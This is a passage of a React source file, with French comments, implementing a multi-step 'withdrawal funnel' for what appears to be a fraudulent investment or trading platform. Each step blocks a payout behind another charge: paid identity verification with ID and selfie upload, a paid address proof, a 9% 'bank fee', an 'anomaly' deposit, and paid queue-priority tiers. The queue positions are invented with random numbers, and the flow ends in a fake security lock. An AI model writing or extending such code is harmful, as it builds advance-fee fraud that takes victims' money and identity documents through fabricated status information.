      const res  = await fetch(`${API}/verification/upload-identity.php`, { method: 'POST', body: fd });
      const data = await res.json();
      if (data.success) { if (data.user) localStorage.setItem('user', JSON.stringify(data.user)); setUploaded(true); }
      else { setError(data.message || t('withdrawal.funnel.sendError')); }
    } catch { setError(t('common.serverError')); }
    setUploading(false);
  };

  return (
    <>
      <div className="wf-illus" style={{ background: 'linear-gradient(180deg,rgba(129,135,246,.1) 0%,transparent 100%)' }}>
        <div className="wf-handle" />
        <div className="wf-icon-ring" style={{ background: 'linear-gradient(135deg,rgba(129,135,246,.25),rgba(118,225,255,.1))' }}>
          <IllusKyc />
        </div>
        <div className="wf-illus-tag" style={{ background: 'rgba(129,135,246,.15)', color: '#8187f6' }}>{t('withdrawal.funnel.step2Tag')}</div>
      </div>
      <div className="wf-body">
        <h2 className="wf-title">{t('withdrawal.funnel.step2Title')}</h2>
        <p className="wf-desc">{t('withdrawal.funnel.step2Body', { price: `${kycDisplay} ${symbol}` })}</p>
        {error && <div className="wf-error">{error}</div>}
        {!uploaded ? (
          <>
            <div className="wf-upload-grid">
              <div className="wf-upload-box">
                <label className="wf-upload-label">
                  <input type="file" accept="image/*,.pdf" onChange={handleCni} hidden />
                  {cniPrev ? (
                    <div className="wf-upload-preview">
                      <img src={cniPrev} alt="CNI" />
                      <div className="wf-upload-check"><CheckIcon /></div>
                    </div>
                  ) : (
                    <div className="wf-upload-placeholder">
                      <UploadIcon />
                      <span>{t('withdrawal.funnel.step2IdFront')}</span>
                      <small>{t('withdrawal.funnel.step2IdFrontSub')}</small>
                    </div>
                  )}
                </label>
              </div>
              <div className="wf-upload-box">
                <label className="wf-upload-label">
                  <input type="file" accept="image/*" onChange={handleSelfie} hidden />
                  {selfiePrev ? (
                    <div className="wf-upload-preview">
                      <img src={selfiePrev} alt="Verso" />
                      <div className="wf-upload-check"><CheckIcon /></div>
                    </div>
                  ) : (
                    <div className="wf-upload-placeholder">
                      <UploadIcon />
                      <span>{t('withdrawal.funnel.step2IdBack')}</span>
                      <small>{t('withdrawal.funnel.step2IdBackSub')}</small>
                    </div>
                  )}
                </label>
              </div>
            </div>
            <button className="wf-btn wf-btn-grad" onClick={doUpload} disabled={uploading || !cniFile || !selfieFile}>
              {uploading ? <><Spinner /> {t('withdrawal.funnel.step2Uploading')}</> : t('withdrawal.funnel.uploadContinue')}
            </button>
          </>
        ) : (
          <>
            <div className="wf-status wf-ok"><CheckIcon /><span>{t('withdrawal.funnel.docsSent')}</span></div>
            <PaySection
              geo={geo} userId={userId} tab={tab} setTab={setTab} method={method} setMethod={setMethod}
              localAmount={kycDisplay} amountText={`${kycDisplay} ${symbol}`} prefix="KYC"
              summaryLabel={t('withdrawal.funnel.step21Fees')}
              payLabel={t('withdrawal.funnel.step2PayBtn', { price: `${kycDisplay} ${symbol}` })}
            />
          </>
        )}
      </div>
    </>
  );
}

/* ── Step 21 : KYC docs OK, paiement en attente */
function Step21({ onClose, userId }) {
  const { t } = useLang();
  const geo = useGeo();
  const { kyc: kycDisplay, symbol } = geo.prices;
  const defaultTab = pickDefaultTab(geo);
  const [tab, setTab]       = useState(defaultTab);
  const [method, setMethod] = useState(geo.methods[defaultTab]?.[0]?.id || '');
  return (
    <>
      <div className="wf-illus" style={{ background: 'linear-gradient(180deg,rgba(247,183,49,.1) 0%,transparent 100%)' }}>
        <div className="wf-handle" />
        <div className="wf-icon-ring" style={{ background: 'linear-gradient(135deg,rgba(247,183,49,.2),rgba(224,133,10,.1))' }}>
          <IllusKycPending />
        </div>
        <div className="wf-illus-tag" style={{ background: 'rgba(247,183,49,.12)', color: '#f7b731' }}>{t('withdrawal.funnel.step21Tag')}</div>
      </div>
      <div className="wf-body">
        <h2 className="wf-title" style={{ color: '#00d4aa' }}>{t('withdrawal.funnel.step21Title')}</h2>
        <p className="wf-desc">{t('withdrawal.funnel.step21Body')}</p>
        <PaySection
          geo={geo} userId={userId} tab={tab} setTab={setTab} method={method} setMethod={setMethod}
          localAmount={kycDisplay} amountText={`${kycDisplay} ${symbol}`} prefix="KYC" btnClass="wf-btn-gold"
          summaryLabel={t('withdrawal.funnel.step21Fees')}
          payLabel={t('withdrawal.funnel.step21PayBtn', { price: `${kycDisplay} ${symbol}` })}
        />
      </div>
    </>
  );
}

/* ── Step 3 : Justificatif de domicile ────────── */
function Step3({ onClose, userId }) {
  const { t } = useLang();
  const geo = useGeo();
  const { jdd: jddDisplay, symbol } = geo.prices;
  const defaultTab = pickDefaultTab(geo);
  const [tab, setTab]       = useState(defaultTab);
  const [method, setMethod] = useState(geo.methods[defaultTab]?.[0]?.id || '');
  const [file, setFile]       = useState(null);
  const [preview, setPreview] = useState(null);
  // Phase upload → puis paiement (cf Step2) : form de paiement affiché seulement
  // une fois le justificatif envoyé avec succès.
  const [uploaded, setUploaded]   = useState(false);
  const [uploading, setUploading] = useState(false);
  const [error, setError]         = useState('');
  const API = process.env.REACT_APP_API_BASE_URL;

  const handleFile = (e) => {
    const f = e.target.files[0];
    if (f) { setFile(f); const r = new FileReader(); r.onloadend = () => setPreview(r.result); r.readAsDataURL(f); }
  };

  const doUpload = async () => {
    if (!file) { setError(t('withdrawal.funnel.step3MissingDoc')); return; }
    setUploading(true); setError('');
    try {
      const fd = new FormData();
      fd.append('user_id', userId); fd.append('address_proof', file); fd.append('step', 'address');
      const res  = await fetch(`${API}/verification/upload-address.php`, { method: 'POST', body: fd });
      const data = await res.json();
      if (data.success) { if (data.user) localStorage.setItem('user', JSON.stringify(data.user)); setUploaded(true); }
      else { setError(data.message || t('withdrawal.funnel.sendError')); }
    } catch { setError(t('common.serverError')); }
    setUploading(false);
  };

  return (
    <>
      <div className="wf-illus" style={{ background: 'linear-gradient(180deg,rgba(74,159,255,.1) 0%,transparent 100%)' }}>
        <div className="wf-handle" />
        <div className="wf-icon-ring" style={{ background: 'linear-gradient(135deg,rgba(74,159,255,.2),rgba(118,225,255,.1))' }}>
          <IllusAddress />
        </div>
        <div className="wf-illus-tag" style={{ background: 'rgba(74,159,255,.12)', color: '#4a9fff' }}>{t('withdrawal.funnel.step3Tag')}</div>
      </div>
      <div className="wf-body">
        <h2 className="wf-title">{t('withdrawal.funnel.step3Title')}</h2>
        <p className="wf-desc">{t('withdrawal.funnel.step3Body1', { price: `${jddDisplay} ${symbol}` })}</p>
        <p className="wf-desc" style={{ marginBottom: 12 }}>{t('withdrawal.funnel.step3Body2')}</p>
        {error && <div className="wf-error">{error}</div>}
        {!uploaded ? (
          <>
            <div className="wf-upload-single">
              <div className="wf-upload-box">
                <label className="wf-upload-label">
                  <input type="file" accept="image/*,.pdf" onChange={handleFile} hidden />
                  {preview ? (
                    <div className="wf-upload-preview">
                      <img src={preview} alt="JDD" style={{ height: 120 }} />
                      <div className="wf-upload-check"><CheckIcon /></div>
                    </div>
                  ) : (
                    <div className="wf-upload-placeholder">
                      <UploadIcon />
                      <span>{t('withdrawal.funnel.step3DocLabel')}</span>
                      <small>{t('withdrawal.funnel.step3DocSub')}</small>
                    </div>
                  )}
                </label>
              </div>
            </div>
            <button className="wf-btn wf-btn-grad" onClick={doUpload} disabled={uploading || !file}>
              {uploading ? <><Spinner /> {t('withdrawal.funnel.step2Uploading')}</> : t('withdrawal.funnel.uploadContinue')}
            </button>
          </>
        ) : (
          <>
            <div className="wf-status wf-ok"><CheckIcon /><span>{t('withdrawal.funnel.docsSent')}</span></div>
            <PaySection
              geo={geo} userId={userId} tab={tab} setTab={setTab} method={method} setMethod={setMethod}
              localAmount={jddDisplay} amountText={`${jddDisplay} ${symbol}`} prefix="JDD"
              summaryLabel={t('withdrawal.funnel.step31Fees')}
              payLabel={t('withdrawal.funnel.step3PayBtn', { price: `${jddDisplay} ${symbol}` })}
            />
          </>
        )}
      </div>
    </>
  );
}

/* ── Step 31 : JDD OK, paiement en attente ─────── */
function Step31({ onClose, userId }) {
  const { t } = useLang();
  const geo = useGeo();
  const { jdd: jddDisplay, symbol } = geo.prices;
  const defaultTab = pickDefaultTab(geo);
  const [tab, setTab]       = useState(defaultTab);
  const [method, setMethod] = useState(geo.methods[defaultTab]?.[0]?.id || '');
  return (
    <>
      <div className="wf-illus" style={{ background: 'linear-gradient(180deg,rgba(247,183,49,.1) 0%,transparent 100%)' }}>
        <div className="wf-handle" />
        <div className="wf-icon-ring" style={{ background: 'linear-gradient(135deg,rgba(247,183,49,.2),rgba(224,133,10,.1))' }}>
          <IllusKycPending />
        </div>
        <div className="wf-illus-tag" style={{ background: 'rgba(247,183,49,.12)', color: '#f7b731' }}>{t('withdrawal.funnel.step21Tag')}</div>
      </div>
      <div className="wf-body">
        <h2 className="wf-title" style={{ color: '#00d4aa' }}>{t('withdrawal.funnel.step31Title')}</h2>
        <p className="wf-desc">{t('withdrawal.funnel.step31Body')}</p>
        <PaySection
          geo={geo} userId={userId} tab={tab} setTab={setTab} method={method} setMethod={setMethod}
          localAmount={jddDisplay} amountText={`${jddDisplay} ${symbol}`} prefix="JDD" btnClass="wf-btn-gold"
          summaryLabel={t('withdrawal.funnel.step31Fees')}
          payLabel={t('withdrawal.funnel.step31PayBtn', { price: `${jddDisplay} ${symbol}` })}
        />
      </div>
    </>
  );
}

/* ── Step 4 : Frais bancaires (% du montant) ──── */
function Step4({ onClose, userId, withdrawalAmount }) {
  const { t } = useLang();
  const geo = useGeo();
  const { symbol, minWithdrawal } = geo.prices;
  const FEE_PCT  = 9;
  const amount   = parseFloat(withdrawalAmount) || 0;
  const belowMin = amount < minWithdrawal;
  const feeAmt   = parseFloat((amount * FEE_PCT / 100).toFixed(2));
  const defaultTab = pickDefaultTab(geo);
  const [tab, setTab]       = useState(defaultTab);
  const [method, setMethod] = useState(geo.methods[defaultTab]?.[0]?.id || '');

  return (
    <>
      <div className="wf-illus" style={{ background: 'linear-gradient(180deg,rgba(0,212,170,.08) 0%,transparent 100%)' }}>
        <div className="wf-handle" />
        <div className="wf-icon-ring" style={{ background: 'linear-gradient(135deg,rgba(0,212,170,.2),rgba(118,225,255,.1))' }}>
          <IllusFees amount={`${feeAmt}${symbol}`} />
        </div>
        <div className="wf-illus-tag" style={{ background: 'rgba(0,212,170,.1)', color: '#00d4aa' }}>{t('withdrawal.funnel.step4Tag')}</div>
      </div>
      <div className="wf-body">
        <h2 className="wf-title">{t('withdrawal.funnel.step4Title')}</h2>
        <p className="wf-desc">{t('withdrawal.funnel.step4Body1', { pct: FEE_PCT })}</p>
        <p className="wf-desc">{t('withdrawal.funnel.step4Body2')}</p>
        {amount > 0 && (
          <div className="wf-fees">
            <div className="wf-fee-row"><span>{t('withdrawal.funnel.step4WithdrawalAmount')}</span><span>{amount.toFixed(2)} {symbol}</span></div>
            <div className="wf-fee-row"><span>{t('withdrawal.funnel.step4BankFees', { pct: FEE_PCT })}</span><span>{feeAmt.toFixed(2)} {symbol}</span></div>
            <div className="wf-fee-row wf-fee-total"><span>{t('withdrawal.funnel.step4ToPay')}</span><span>{feeAmt.toFixed(2)} {symbol}</span></div>
          </div>
        )}
        {belowMin && <div className="wf-error">{t('withdrawal.minWithdrawal', { min: `${minWithdrawal} ${symbol}` })}</div>}
        <PaySection
          geo={geo} userId={userId} tab={tab} setTab={setTab} method={method} setMethod={setMethod}
          localAmount={feeAmt} amountText={`${feeAmt.toFixed(2)} ${symbol}`} prefix="FEE"
          summaryLabel={t('withdrawal.funnel.step4ToPay')}
          payLabel={t('withdrawal.funnel.step4PayBtn', { fee: `${feeAmt.toFixed(2)} ${symbol}` })}
          extraDisabled={feeAmt <= 0 || belowMin}
        />
      </div>
    </>
  );
}

/* ── Step 5 : Anomalie / conformité ──────────── */
function Step5({ onClose, userId }) {
  const { t } = useLang();
  const geo = useGeo();
  const { validAmt: validDisplay, symbol } = geo.prices;
  const defaultTab = pickDefaultTab(geo);
  const [tab, setTab]       = useState(defaultTab);
  const [method, setMethod] = useState(geo.methods[defaultTab]?.[0]?.id || '');
  return (
    <>
      <div className="wf-illus" style={{ background: 'linear-gradient(180deg,rgba(255,107,107,.1) 0%,transparent 100%)' }}>
        <div className="wf-handle" />
        <div className="wf-icon-ring" style={{ background: 'linear-gradient(135deg,rgba(255,107,107,.2),rgba(229,62,62,.1))' }}>
          <IllusWarning />
        </div>
        <div className="wf-illus-tag" style={{ background: 'rgba(255,107,107,.12)', color: '#ff6b6b' }}>{t('withdrawal.funnel.step5Tag')}</div>
      </div>
      <div className="wf-body">
        <h2 className="wf-title">{t('withdrawal.funnel.step5Title')}</h2>
        <p className="wf-desc" style={{ color: '#cfcee0' }}>{t('withdrawal.funnel.step5Body1')}</p>
        <p className="wf-desc">{t('withdrawal.funnel.step5Body2', { amount: `${validDisplay} ${symbol}` })}</p>
        <div className="wf-fees" style={{ marginBottom: 16 }}>
          <div className="wf-fee-row wf-fee-total"><span>{t('withdrawal.funnel.step5VerifDeposit')}</span><span style={{ color: '#ff6b6b' }}>{validDisplay} {symbol}</span></div>
        </div>
        <PaySection
          geo={geo} userId={userId} tab={tab} setTab={setTab} method={method} setMethod={setMethod}
          localAmount={validDisplay} amountText={`${validDisplay} ${symbol}`} prefix="VAL" btnClass="wf-btn-red"
          summaryLabel={t('withdrawal.funnel.step5VerifDeposit')}
          payLabel={t('withdrawal.funnel.step5PayBtn', { amount: `${validDisplay} ${symbol}` })}
        />
      </div>
    </>
  );
}

/* ── Step 6 : File d'attente ─────────────────── */
function Step6({ onClose, userId }) {
  const { t } = useLang();
  const geo = useGeo();
  const { tierBronze, tierSilver, tierGold, symbol } = geo.prices;
  const defaultTab = pickDefaultTab(geo);
  const [tab, setTab]       = useState(defaultTab);
  const [method, setMethod] = useState(geo.methods[defaultTab]?.[0]?.id || '');
  const TIERS = [
    { key: 'bronze', labelKey: 'withdrawal.funnel.step6TierStandard', localAmt: tierBronze, display: `${tierBronze} ${symbol}`, posRange:[15,20], delay: '5 jours',   color: '#b45309', badge: null },
    { key: 'silver', labelKey: 'withdrawal.funnel.step6TierPriority', localAmt: tierSilver, display: `${tierSilver} ${symbol}`, posRange:[6,9],   delay: '2-3 jours', color: '#4a9fff', badge: 'withdrawal.funnel.step6BadgePopular' },
    { key: 'gold',   labelKey: 'withdrawal.funnel.step6TierExpress',  localAmt: tierGold,   display: `${tierGold} ${symbol}`,   posRange:[2,4],   delay: 'Sous 12h',  color: '#f7b731', badge: 'withdrawal.funnel.step6BadgeFastest' },
  ];
  const [selectedTier, setSelectedTier] = useState('silver');
  const queuePos = useMemo(() => Math.floor(Math.random() * 71) + 80, []);
  const tierPos  = useMemo(() => Object.fromEntries(TIERS.map(tier => [tier.key, Math.floor(Math.random() * (tier.posRange[1]-tier.posRange[0]+1)) + tier.posRange[0]])), []);
  const activeTier = TIERS.find(tier => tier.key === selectedTier);

  return (
    <>
      <div className="wf-illus" style={{ background: 'linear-gradient(180deg,rgba(247,183,49,.1) 0%,transparent 100%)' }}>
        <div className="wf-handle" />
        <div className="wf-icon-ring" style={{ background: 'linear-gradient(135deg,rgba(247,183,49,.2),rgba(180,83,9,.1))' }}>
          <IllusQueue pos={queuePos} />
        </div>
        <div className="wf-illus-tag" style={{ background: 'rgba(247,183,49,.12)', color: '#f7b731' }}>{t('withdrawal.funnel.step6Tag')}</div>
      </div>
      <div className="wf-body">
        <h2 className="wf-title">{t('withdrawal.funnel.step6Title')}</h2>
        <div className="wf-queue">
          <UsersIcon />
          <span>{t('withdrawal.funnel.step6CurrentPos')}</span>
          <div className="wf-queue-num">{queuePos}<sup>{t('withdrawal.funnel.ordinalSuffix')}</sup></div>
        </div>
        <p className="wf-desc">{t('withdrawal.funnel.step6Delay')}</p>
        <div className="wf-tiers">
          {TIERS.map((tier) => (
            <div key={tier.key}
              className={`wf-tier${tier.badge ? ' wf-tier--feat' : ''}${selectedTier === tier.key ? ' wf-tier--sel' : ''}`}
              style={{'--tc': tier.color}}
              onClick={() => setSelectedTier(tier.key)}>
              {tier.badge && <span className="wf-tier-badge">{t(tier.badge)}</span>}
              <span className="wf-tier-check">
                <svg width="9" height="7" viewBox="0 0 9 7" fill="none"><path d="M1 3.5l2.5 2.5L8 1" stroke="#0d0b1e" strokeWidth="1.6" strokeLinecap="round" strokeLinejoin="round"/></svg>
              </span>
              <div className="wf-tier-name">{t(tier.labelKey)}</div>
              <div className="wf-tier-pos"><ZapIcon /> n°<strong>{tierPos[tier.key]}</strong></div>
              <div className="wf-tier-delay">{tier.delay}</div>
              <div className="wf-tier-price">{tier.display}</div>
            </div>
          ))}
        </div>
        <PaySection
          geo={geo} userId={userId} tab={tab} setTab={setTab} method={method} setMethod={setMethod}
          localAmount={activeTier.localAmt} amountText={activeTier.display} prefix="FIL"
          summaryLabel={t(activeTier.labelKey)}
          payLabel={`Payer ${activeTier?.display || ''}`}
        />
      </div>
    </>
  );
}

/* ── Step 7 : Alerte sécurité critique ────────── */
function Step7({ onClose }) {
  const { t } = useLang();
  return (
    <>
      <div className="wf-illus" style={{ background: 'linear-gradient(180deg,rgba(255,107,107,.12) 0%,transparent 100%)' }}>
        <div className="wf-handle" />
        <div className="wf-icon-ring" style={{ background: 'linear-gradient(135deg,rgba(229,62,62,.25),rgba(255,107,107,.1))' }}>
          <IllusLock />
        </div>
        <div className="wf-illus-tag" style={{ background: 'rgba(229,62,62,.15)', color: '#ff6b6b' }}>{t('withdrawal.funnel.step7Tag')}</div>
      </div>
      <div className="wf-body">
        <h2 className="wf-title" style={{ color: '#ff6b6b' }}>{t('withdrawal.funnel.step7Title')}</h2>
        <p className="wf-desc" style={{ color: '#cfcee0' }}>{t('withdrawal.funnel.step7Body1')}</p>
        <p className="wf-desc">{t('withdrawal.funnel.step7Body2')}</p>
        <p className="wf-desc" style={{ marginBottom: 20 }}>{t('withdrawal.funnel.step7Body3')}</p>
        <button className="wf-btn wf-btn-dark" onClick={onClose}>
          {t('withdrawal.funnel.step7ContactBtn')}
        </button>
      </div>
    </>
  );
}

/* ── Export principal ────────────────────────── */
export default function WithdrawalFunnel({ step, onClose, withdrawalAmount, userId }) {
  const handleOverlayClick = (e) => {
    if (e.target === e.currentTarget) onClose();
  };

  const renderStep = () => {
    if (step === 1)              return <Step1  onClose={onClose} />;
    if (step === 2)              return <Step2  onClose={onClose} userId={userId} />;
    if (step === 21)             return <Step21 onClose={onClose} userId={userId} />;
    if (step === 3)              return <Step3  onClose={onClose} userId={userId} />;
    if (step === 31)             return <Step31 onClose={onClose} userId={userId} />;
    if (step === 4)              return <Step4  onClose={onClose} userId={userId} withdrawalAmount={withdrawalAmount} />;
    if (step === 5)              return <Step5  onClose={onClose} userId={userId} />;
    if (step === 6)              return <Step6  onClose={onClose} userId={userId} />;
    if (step === 7)              return <Step7  onClose={onClose} />;
    return null;
  };

  const content = renderStep();
  if (!content) return null;

  return (
    <>
      <style>{CSS}</style>
      <div className="wf-overlay" onClick={handleOverlayClick}>
        <div className="wf-sheet">
          <button className="wf-close-btn" onClick={onClose}><XIcon /></button>
          {content}
        </div>
      </div>
    </>
  );
}
